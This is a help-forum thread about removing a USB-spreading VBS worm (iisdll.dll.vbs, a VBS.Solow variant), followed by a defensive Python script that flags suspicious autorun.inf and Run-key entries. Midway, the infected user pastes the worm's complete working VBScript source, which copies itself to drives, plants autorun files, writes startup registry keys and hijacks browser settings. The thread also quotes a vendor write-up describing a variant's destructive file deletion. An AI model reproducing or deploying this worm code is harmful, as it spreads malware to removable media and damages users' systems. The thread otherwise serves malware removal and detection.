iisdll.dll.vbs file?

Hi Guys.

This is my first post. I think my system is infected with a virus, it’s sitting there as a start-up item

c:\windows\iisdll.dll.vbs

http://i16.tinypic.com/44imv0l.jpg

How do I delete that particular file? I searched that windows directory, but couldn’t find the file (it’s not hidden also). I tried even the command prompt DEL command, not working :frowning:

Please advise

LM ~

^

One more thing, I have Avast installed in my system, it’s not finding that virus either. :-\

Welcome to the forum linuxman.

Try scanning the file at Virus Total

http://www.virustotal.com/en/indexf.html

I’m always suspicious of files with a double extension such as .dll.vbs

You should uncheck the start-up entry for it (don’t delete the entry just yet) and reboot; that should hopefully stop it running on boot.

You obviously have the show hidden files and folders ticked (?), but do you have the Hide extensions for known file types unchecked? See image.

@ mauserme
If linuxman can’t find the file he is going to be unable to upload it.

A google search for iisdll.dll.vbs returns many hits; this is just one: http://www.greatis.com/appdata/d/Windows/i/iisdll.dll.vbs_Removal.htm

%WinDir%\IISDLL.dll.vbs is VBS.Solow.E. VBS.Solow.E is a worm that copies itself to removable drives.

Before you remove it (assuming you find it), add it to the avast chest User Files section and submit the sample to avast.

I completely missed the sentence below the image …

Yes, as you said - change the folder options, remove it from the startups and see if it’s found on reboot.

Thank you mauserme & David!

I had to use FileASSASSIN to delete the file.

I am posting the contents of the file here; it may be useful for you people for further reference.

c:\windows\iisdll.dll.vbs

'My name is Sukorn test script for bootsecter
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe IISDLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\IISDLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\IISDLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\IISDLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\IISDLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\IISDLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\IISDLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\IISDLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by MOOzilla"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.lastchaos.in.th/"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Even though I removed the entire file and registry entry, still one problem remains

I am still not able to open my drives from My Computer by double clicking it.

Any idea how to solve this?

Thanks again!

If a virus is replicant (coming and coming again), you should:

  1. Disable System Restore on Windows ME or Windows XP. System Restore cannot be disabled on Windows 9x and it’s not available in Windows 2k. After boot you can enable System Restore again.

  2. Clean your temporary files. You can use CleanUp or the Windows Advanced Care features for that.

  3. It will be good if you download, install, update and run AVG Antispyware. Some users recommend SUPERantispyware, Spyware Terminator and/or a-squared (take care about false positives).

  4. Use the immunization of SpywareBlaster or, which is better, the Windows Advanced Care features of spyware/adware cleaning and removal.

One more thing, I scanned the file using http://virusscan.jotti.org/

Please see the results :-\

http://i16.tinypic.com/3zqe4vs.jpg

Can you send the samples to virus@avast.com ?
You can zip and password the files… Inform a link to this thread and the password used.
You can send the files to Chest and, from there, resend to Alwil for analysis.
Thanks.

Indeed it does not seem a false positive…

^
OK, I sent it; meanwhile the file is back in the same old location again!

This sucks :frowning:

Really? Do you think it is a false positive or you can’t get rid of it?

I used FileASSASSIN to delete the file completely; somehow it’s coming back (both file & registry entry) after the restart.

Don’t know the reason ???

btw, what is a false positive?

http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2007-022815-2726-99&tabid=2

On the script’s 100th execution it will attempt to delete critical files including:

%SystemDrive%\boot.ini
%SystemDrive%\IO.SYS
%SystemDrive%\MSDOS.SYS
%SystemDrive%\NTDETECT.COM
%SystemDrive%\ntldr

and recursively delete all files, folders and subfolders on all available drives excluding the following:

%Windir%
%ProgramFiles%
%SystemDrive%\Documents and Settings

This value will not increment if the following file exists:
%Windir%\I will survive.txt

Needs to be gone ASAP: VBS.Solow.D

Well there would appear to be another element restoring this file.

A false positive is a file that is detected as malware but subsequently proves to be a good file. This is why deletion is never a good first option.

If you haven’t already got this software (freeware), download, install, update and run it, preferably in safe mode.
Ewido, a.k.a. AVG Anti-Spyware, if using WinXP.

^
I am downloading…

Also see http://virusinfo.prevx.com/pxparall.asp?PXC=29fd75689836 re vbs.solow.d; it would look like this differs in that the name is different, but all seem to have the common double file extension of .dll.vbs.

Thanks everyone for the help. Finally the problem is solved, thanks to AVG Anti-Spyware. One issue is still there: I am still not able to open my drives from My Computer by double clicking them. Right click > Open works fine. I think it’s because of that virus attack.

Any ideas??

Thanks again :slight_smile:

Why would you use my computer to do a task (opening drives), which is more applicable to explorer, or can’t you use that ?

Have you tried a google search for "cant open drives from my computer"? I did and it returns many hits, http://www.google.com/search?q=cant+open+drives+from+my+computer; this is just one of them: http://www.daniweb.com/techtalkforums/thread68737.html
Check them out.

Sorry I also meant opening through explorer!

Please see the below pic.

http://i17.tinypic.com/2w24ldh.jpg

I couldn’t find any Autorun.inf file under the drive

Thanks

The Autorun.inf is superhidden. To see it, open Folder Option, choose View tab, choose Show hidden files and folders, and untick Hide protected operating system files, OK.
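Two things in this thread lend themselves to a worked check: the attribute values the posted script sets on its copies (32 to make the file writable, then 39), and the superhidden autorun.inf that the last reply explains. The Python below is an added example written from the defender's side, not code from the thread or from any vendor tool; it decodes the attribute bitmask, parses an autorun.inf for launch keys that invoke a script host or a double-extension file, and applies the same checks to a Run-key value. The sample inputs are constructed from values quoted earlier in the thread; the function names are my own.

```python
"""
Defender-side triage helpers for the indicators discussed in this thread:
FSO/Win32 attribute values (32 and 39), autorun.inf launch keys that call
a script host, double extensions such as .dll.vbs, and Run-key values
that point at a script.  Added example; not code from the thread.
"""
import re
from typing import Dict, List

# Win32 / FileSystemObject attribute bits.  The posted script sets
# attributes = 32 (Archive only) so it can overwrite the file, then 39.
FILE_ATTRIBUTE_BITS = {
    1: "ReadOnly",
    2: "Hidden",
    4: "System",
    32: "Archive",
}


def decode_attributes(value: int) -> List[str]:
    """Return the attribute names set in an FSO/Win32 attribute bitmask."""
    return [name for bit, name in sorted(FILE_ATTRIBUTE_BITS.items()) if value & bit]


def is_superhidden(value: int) -> bool:
    """Hidden + System together is what Explorer hides under 'Hide protected
    operating system files', so a search shows nothing until it is unticked."""
    return bool(value & 2) and bool(value & 4)


def parse_autorun_inf(text: str) -> Dict[str, str]:
    """Parse the [autorun] section of an autorun.inf into a dict with
    lower-cased keys; other sections and ';' comments are ignored."""
    entries: Dict[str, str] = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


# Interpreters a media autorun.inf has no legitimate reason to invoke.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
# A data/binary extension followed by a script extension, e.g. IISDLL.dll.vbs
DOUBLE_SCRIPT_EXT = re.compile(
    r"\.(dll|exe|jpg|gif|doc|txt|pdf|mp3)\.(vbs|vbe|js|jse|wsf|wsh)$", re.I)
# [autorun] keys that cause something to execute.
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command")


def command_findings(where: str, command: str) -> List[str]:
    """Flag a command line for script-host use and double extensions."""
    findings = []
    if any(host in command.lower() for host in SCRIPT_HOSTS):
        findings.append(f"{where}: launches a script host ({command})")
    for token in command.replace('"', "").split():
        if DOUBLE_SCRIPT_EXT.search(token):
            findings.append(f"{where}: double extension on {token}")
    return findings


def autorun_findings(text: str) -> List[str]:
    """Run the command checks over every launch key of an autorun.inf."""
    entries = parse_autorun_inf(text)
    findings = []
    for key in LAUNCH_KEYS:
        if key in entries:
            findings += command_findings(f"autorun.inf {key}", entries[key])
    return findings


def run_entry_findings(name: str, command: str) -> List[str]:
    """Check a Run-key value (name, data) as it appears in msconfig's Startup tab."""
    findings = command_findings(f"Run\\{name}", command)
    if re.search(r"\.(vbs|vbe|js|jse|wsf)$", command.strip().strip('"'), re.I):
        findings.append(f"Run\\{name}: startup item is a script file ({command})")
    return findings


# Constructed samples, built from values quoted in the thread.
WORM_AUTORUN = "[autorun]\r\nshellexecute=wscript.exe IISDLL.dll.vbs"     # what the script writes as atr
BENIGN_AUTORUN = "[autorun]\r\nicon=setup.exe,0\r\nlabel=Holiday photos"  # typical media disc, no launch key
WORM_RUN_ENTRY = ("MS32DLL", r"C:\WINDOWS\IISDLL.dll.vbs")                # the Run value the script writes

if __name__ == "__main__":
    print("attributes 39 =", decode_attributes(39), "superhidden:", is_superhidden(39))
    for finding in autorun_findings(WORM_AUTORUN) + run_entry_findings(*WORM_RUN_ENTRY):
        print("FLAG", finding)
    print("benign autorun findings:", autorun_findings(BENIGN_AUTORUN))
```

The attribute decode explains the symptom in the first post: 39 is ReadOnly + Hidden + System + Archive, and the Hidden + System pair is exactly the "protected operating system file" case that Explorer and a normal search skip. The autorun check is what you would run over the root of each drive once the file is visible; a media disc's autorun.inf normally carries only icon and label keys, so any launch key that names wscript.exe or a .dll.vbs file stands out immediately.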